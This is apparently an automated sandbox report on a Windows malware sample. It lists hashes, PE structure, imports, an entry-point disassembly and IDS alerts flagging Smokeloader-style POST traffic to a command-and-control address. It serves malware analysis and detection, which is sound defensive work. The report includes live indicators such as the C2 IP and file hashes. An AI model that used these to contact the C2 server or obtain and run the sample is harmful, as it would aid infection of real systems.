                                                                                                                                            SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                                                                                                                            MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                                                                                                                            SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                                                                                                                            SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                                                                                                                            SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr
                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2021096
                                                                                                                                            Entropy (8bit):4.368133315535763
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:wUPm96z4S/zCtTFL/mcOJmsEMAX5Amwg0a:wUPm6/EFSyJdX5Am5
                                                                                                                                            MD5:FBFC7A6D58571AF46628818A232931A5
                                                                                                                                            SHA1:A0CADE21EAE601272369479ADD5B8823E3399FAC
                                                                                                                                            SHA-256:715C6CB65D337B5BABBBF414D1D18A2E9AFDE116BFEE5413C8CAB645E8522C27
                                                                                                                                            SHA-512:A1D26181FB43B05D23A0D3B9C74BD73903009BB861073155D9564053B340E09B85A8F3EA51AB2A6A4617555A91C237F6843E83CEB2E609B3231D79D4CE284730
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@............................. ......]V.......................................................S..........`@..............hR...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc...`@.......B...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):231936
                                                                                                                                            Entropy (8bit):6.283574300449475
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:co/xLMaSrWrgPkJ7A/LRnTT1YiNNGJoD5k8Ewv6ClhJVfkpWAw5EcfkpWAQyWIE:c8xLVjrE/FPNNGYHRVfXZ1fXB7
                                                                                                                                            MD5:49A8BAC4600ABA0061CD216A4C75185C
                                                                                                                                            SHA1:2064A33ACCB877BB6226ED637F90ED8C5669AC52
                                                                                                                                            SHA-256:D8B3CD0FFF8C02D9B9FD648CD26B1E211614B2897DAA6FCDAD740C818DED25F6
                                                                                                                                            SHA-512:D37D431B0654D569449CB1959C849475BDFC8AF0AEA1EDFD7CD105F62B5B90698857367A7A97A7E4E4B596CB347251D3D6FC45D1D6D6AA2DD74D774FAA82CD6D
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..|..|..|...Ou.}..bRg.f..bRv.l..bR`.'..[..{..|.....bRi.}..bRw.}..bRr.}..Rich|..................PE..L......d.................d........................@..........................P......V...........................................P....p..8............................................................................................................text....b.......d.................. ..`.rdata..&!......."...h..............@..@.data...............................@....tasifal|....@......................@....tls.........P......................@....cuda........`......................@....rsrc...8....p......................@..@........................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):231936
                                                                                                                                            Entropy (8bit):6.283574300449475
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:co/xLMaSrWrgPkJ7A/LRnTT1YiNNGJoD5k8Ewv6ClhJVfkpWAw5EcfkpWAQyWIE:c8xLVjrE/FPNNGYHRVfXZ1fXB7
                                                                                                                                            MD5:49A8BAC4600ABA0061CD216A4C75185C
                                                                                                                                            SHA1:2064A33ACCB877BB6226ED637F90ED8C5669AC52
                                                                                                                                            SHA-256:D8B3CD0FFF8C02D9B9FD648CD26B1E211614B2897DAA6FCDAD740C818DED25F6
                                                                                                                                            SHA-512:D37D431B0654D569449CB1959C849475BDFC8AF0AEA1EDFD7CD105F62B5B90698857367A7A97A7E4E4B596CB347251D3D6FC45D1D6D6AA2DD74D774FAA82CD6D
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..|..|..|...Ou.}..bRg.f..bRv.l..bR`.'..[..{..|.....bRi.}..bRw.}..bRr.}..Rich|..................PE..L......d.................d........................@..........................P......V...........................................P....p..8............................................................................................................text....b.......d.................. ..`.rdata..&!......."...h..............@..@.data...............................@....tasifal|....@......................@....tls.........P......................@....cuda........`......................@....rsrc...8....p......................@..@........................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):229888
                                                                                                                                            Entropy (8bit):6.265416660154845
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:yxLlt/h9UgZelpkNYTbUo/OBBce9j5o28Ewv6ClhJt/5EYjyWIE:yxLltJ9ZskKTQoWB+HRNN7
                                                                                                                                            MD5:08E3912BD337BFF072BD1346DDC39F3A
                                                                                                                                            SHA1:4968A92E8D90C576EA9BED482B5D36DE2254E0E1
                                                                                                                                            SHA-256:CAE15EB4334C0D36ED9152D852766F970DF9A0159895050742CA1036D54B0C37
                                                                                                                                            SHA-512:68ABB38096E0ABE9896C7215BCC2DACFE4BB06C7B61FC905E2BD6A7575AC4BB61F56F1CA154F7187D6F6129633E81CD2DC4E28054987889F5C5D36367084FDE2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..|..|..|...Ou.}..bRg.f..bRv.l..bR`.'..[..{..|.....bRi.}..bRw.}..bRr.}..Rich|..................PE..L...i.Le.................\...................p....@..........................@......c...........................................P....`..8............................................................................p...............................text....[.......\.................. ..`.rdata..&!...p..."...`..............@..@.data...............................@....xezuxe.|....0......................@....tls.........@......................@....yuvatom.....P......................@....rsrc...8....`......................@..@........................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:true
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):6.265416660154845
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:HaPJ2rPP6w.exe
                                                                                                                                            File size:229'888 bytes
                                                                                                                                            MD5:08e3912bd337bff072bd1346ddc39f3a
                                                                                                                                            SHA1:4968a92e8d90c576ea9bed482b5d36de2254e0e1
                                                                                                                                            SHA256:cae15eb4334c0d36ed9152d852766f970df9a0159895050742ca1036d54b0c37
                                                                                                                                            SHA512:68abb38096e0abe9896c7215bcc2dacfe4bb06c7b61fc905e2bd6a7575ac4bb61f56f1ca154f7187d6f6129633e81cd2dc4e28054987889f5c5d36367084fde2
                                                                                                                                            SSDEEP:3072:yxLlt/h9UgZelpkNYTbUo/OBBce9j5o28Ewv6ClhJt/5EYjyWIE:yxLltJ9ZskKTQoWB+HRNN7
                                                                                                                                            TLSH:69244A1076FED0E6F7B74A359AB0DDA899FBBCF3A970419B22C4562F18316808951733
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8a..|...|...|....Ou.}...bRg.f...bRv.l...bR`.'...[...{...|.......bRi.}...bRw.}...bRr.}...Rich|...................PE..L...i.Le...
                                                                                                                                            Icon Hash:17694cb2b24d2117
                                                                                                                                            Entrypoint:0x401882
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x654CB569 [Thu Nov 9 10:33:13 2023 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:5
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:5
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:5
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:0d528cb11b391cc85272fa6bac17f245
                                                                                                                                            Instruction
                                                                                                                                            call 00007F1D2140F149h
                                                                                                                                            jmp 00007F1D2140C11Eh
                                                                                                                                            mov edi, edi
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            sub esp, 00000328h
                                                                                                                                            mov dword ptr [0041B808h], eax
                                                                                                                                            mov dword ptr [0041B804h], ecx
                                                                                                                                            mov dword ptr [0041B800h], edx
                                                                                                                                            mov dword ptr [0041B7FCh], ebx
                                                                                                                                            mov dword ptr [0041B7F8h], esi
                                                                                                                                            mov dword ptr [0041B7F4h], edi
                                                                                                                                            mov word ptr [0041B820h], ss
                                                                                                                                            mov word ptr [0041B814h], cs
                                                                                                                                            mov word ptr [0041B7F0h], ds
                                                                                                                                            mov word ptr [0041B7ECh], es
                                                                                                                                            mov word ptr [0041B7E8h], fs
                                                                                                                                            mov word ptr [0041B7E4h], gs
                                                                                                                                            pushfd
                                                                                                                                            pop dword ptr [0041B818h]
                                                                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                                                                            mov dword ptr [0041B80Ch], eax
                                                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                                                            mov dword ptr [0041B810h], eax
                                                                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                                                                            mov dword ptr [0041B81Ch], eax
                                                                                                                                            mov eax, dword ptr [ebp-00000320h]
                                                                                                                                            mov dword ptr [0041B758h], 00010001h
                                                                                                                                            mov eax, dword ptr [0041B810h]
                                                                                                                                            mov dword ptr [0041B70Ch], eax
                                                                                                                                            mov dword ptr [0041B700h], C0000409h
                                                                                                                                            mov dword ptr [0041B704h], 00000001h
                                                                                                                                            mov eax, dword ptr [0041A008h]
                                                                                                                                            mov dword ptr [ebp-00000328h], eax
                                                                                                                                            mov eax, dword ptr [0041A00Ch]
                                                                                                                                            mov dword ptr [ebp-00000324h], eax
                                                                                                                                            call dword ptr [000000D8h]
                                                                                                                                            Programming Language:
                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x187ac0x50.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x1db38.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x183f80x18.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x170000x1a0.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x15bff0x15c00faf0ddbd774f82293d5ce808a058ac83False0.8077743354885057data7.50895133113937IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x170000x21260x2200540e2026171ab81664b69cdd80b86726False0.35891544117647056data5.484532619707042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0x1a0000xf8f9c0x1800a4c068bb548c43da9045f6650014ab7aFalse0.14567057291666666data1.584258087696549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .xezuxe0x1130000x7c0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .tls0x1140000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .yuvatom0x1150000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x1160000x1db380x1dc005d1515d11ff4539591b73e36b0e943b6False0.4643595719537815data5.114963564306975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            AFX_DIALOG_LAYOUT0x12e9a80x2data5.0
                                                                                                                                            LABOWARILEMEHISE0x12e5a80x3faASCII text, with very long lines (1018), with no line terminatorsTurkishTurkey0.6277013752455796
                                                                                                                                            RT_ICON0x116a800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5714285714285714
                                                                                                                                            RT_ICON0x1179280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.648014440433213
                                                                                                                                            RT_ICON0x1181d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6918202764976958
                                                                                                                                            RT_ICON0x1188980x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7514450867052023
                                                                                                                                            RT_ICON0x118e000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5215767634854772
                                                                                                                                            RT_ICON0x11b3a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6219512195121951
                                                                                                                                            RT_ICON0x11c4500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6352459016393442
                                                                                                                                            RT_ICON0x11cdd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7659574468085106
                                                                                                                                            RT_ICON0x11d2b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39418976545842216
                                                                                                                                            RT_ICON0x11e1600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5
                                                                                                                                            RT_ICON0x11ea080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5178571428571429
                                                                                                                                            RT_ICON0x11f0d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5520231213872833
                                                                                                                                            RT_ICON0x11f6380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.34740663900414936
                                                                                                                                            RT_ICON0x121be00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37617260787992496
                                                                                                                                            RT_ICON0x122c880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.4
                                                                                                                                            RT_ICON0x1236100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41400709219858156
                                                                                                                                            RT_ICON0x123af00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39498933901918976
                                                                                                                                            RT_ICON0x1249980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5550541516245487
                                                                                                                                            RT_ICON0x1252400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6192396313364056
                                                                                                                                            RT_ICON0x1259080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.638728323699422
                                                                                                                                            RT_ICON0x125e700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4392589118198874
                                                                                                                                            RT_ICON0x126f180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4319672131147541
                                                                                                                                            RT_ICON0x1278a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4778368794326241
                                                                                                                                            RT_ICON0x127d700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39418976545842216
                                                                                                                                            RT_ICON0x128c180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5
                                                                                                                                            RT_ICON0x1294c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5178571428571429
                                                                                                                                            RT_ICON0x129b880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5520231213872833
                                                                                                                                            RT_ICON0x12a0f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.34740663900414936
                                                                                                                                            RT_ICON0x12c6980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37617260787992496
                                                                                                                                            RT_ICON0x12d7400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.4
                                                                                                                                            RT_ICON0x12e0c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41400709219858156
                                                                                                                                            RT_STRING0x12eb680x3c2data0.4656964656964657
                                                                                                                                            RT_STRING0x12ef300x64cdata0.43424317617866004
                                                                                                                                            RT_STRING0x12f5800x7aadata0.4260958205912334
                                                                                                                                            RT_STRING0x12fd300x798data0.42335390946502055
                                                                                                                                            RT_STRING0x1304c80x6fadata0.4232922732362822
                                                                                                                                            RT_STRING0x130bc80x73cdata0.423866090712743
                                                                                                                                            RT_STRING0x1313080x7a8data0.4229591836734694
                                                                                                                                            RT_STRING0x131ab00x684data0.4316546762589928
                                                                                                                                            RT_STRING0x1321380x7f4data0.42288801571709234
                                                                                                                                            RT_STRING0x1329300x6bcdata0.42981438515081205
                                                                                                                                            RT_STRING0x132ff00x5bedata0.445578231292517
                                                                                                                                            RT_STRING0x1335b00x4eadata0.4467408585055644
                                                                                                                                            RT_STRING0x133aa00x96data0.5933333333333334
                                                                                                                                            RT_GROUP_ICON0x123a780x76dataTurkishTurkey0.6694915254237288
                                                                                                                                            RT_GROUP_ICON0x12e5300x76dataTurkishTurkey0.6694915254237288
                                                                                                                                            RT_GROUP_ICON0x11d2400x76dataTurkishTurkey0.6610169491525424
                                                                                                                                            RT_GROUP_ICON0x127d080x68dataTurkishTurkey0.7211538461538461
                                                                                                                                            RT_VERSION0x12e9b00x1b4data0.573394495412844
                                                                                                                                            DLLImport
                                                                                                                                            KERNEL32.dllGetNumaProcessorNode, GetConsoleAliasExesLengthA, InterlockedDecrement, QueryDosDeviceA, GetEnvironmentStringsW, InterlockedCompareExchange, GetComputerNameW, GetModuleHandleW, ReadConsoleW, FormatMessageA, ReadConsoleOutputA, SetCommState, GetVolumeInformationA, LoadLibraryW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesA, SetConsoleMode, GetFileAttributesW, GetBinaryTypeA, GetConsoleAliasesLengthW, GetLastError, GetLongPathNameW, GetProcAddress, CopyFileA, LoadLibraryA, LocalAlloc, MoveFileA, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetCommTimeouts, FreeEnvironmentStringsW, BuildCommDCBA, FatalAppExitA, WriteConsoleOutputAttribute, ReleaseMutex, FindAtomW, CreateFileA, SetStdHandle, GetStdHandle, SetPriorityClass, HeapAlloc, HeapReAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, WriteFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetFilePointer, CloseHandle
                                                                                                                                            USER32.dllGetFocus
                                                                                                                                            ADVAPI32.dllObjectPrivilegeAuditAlarmA
                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            TurkishTurkey
                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-10-04T19:17:31.163380+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449736177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:32.743839+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449737177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:34.015007+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449738177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:35.661779+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449739177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:37.176772+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449740177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:38.461103+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449741177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:39.742990+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449742177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:41.936055+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449743177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:43.234932+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449744177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:44.532366+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449745177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:46.021153+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449746177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:47.327483+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:48.977509+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449748177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:50.437179+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449749177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:51.852257+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449750177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:53.125210+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449751177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:54.706817+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449752177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:55.981022+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449753177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:57.270101+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449754177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:58.562666+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449756177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:17:59.955931+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449758177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:01.349075+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449764177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:02.656822+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449771177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:04.047722+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449781177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:06.619406+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449798177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:08.108094+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449804177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:09.566598+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449815177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:11.147908+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449819177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:12.412956+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449826177.129.90.10680TCP
